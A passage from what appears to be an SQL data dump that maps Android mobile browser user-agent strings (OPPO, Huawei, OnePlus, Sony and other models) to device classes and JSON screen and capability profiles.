Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH1979) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH1989) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2005) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2009) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2013) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2021) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2025) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":905,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2037) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2043) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2059) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2061) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2065) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2067) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2069) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2089) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2091) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2095) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2109) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2113) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2121) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2125) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2127) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2135) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2137) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2161) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2179) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2185) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH2239) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Core-X4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; DNN-LX9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; DRA-LX9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; DRA-LX9; HMSCore 5.0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; DRA-LX9; HMSCore 5.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; DRA-LX9; HMSCore 5.3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; DUA-LX9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; E940-2795-00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; EBG-AN10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ELE-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ELE-L04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ELE-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ELE-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ELS-NX9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":880,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; EML-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; EML-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; EML-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; EVR-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; EVR-N29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; F-02L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; F-04K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; F-41A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; F2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; FP3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; FRL-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; GM1900) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; GM1901) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; GM1903) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; GM1910) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; GM1911) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; GM1913) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; GM1915) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; GM1917) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; GM1920) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; GM1925) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; H8166) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; H8216) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; H8266) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; H8296) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; H8314) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; H8324) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; H8416) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; H9436) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; H9493) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HD1900) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HD1901) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HD1903) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HD1905) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HD1907) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HD1910) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HD1911) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HD1913) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HEYOU60) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HLK-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HMA-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HMA-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; HMA-L29) AppleWebKit/* (KHTML, like Gecko) 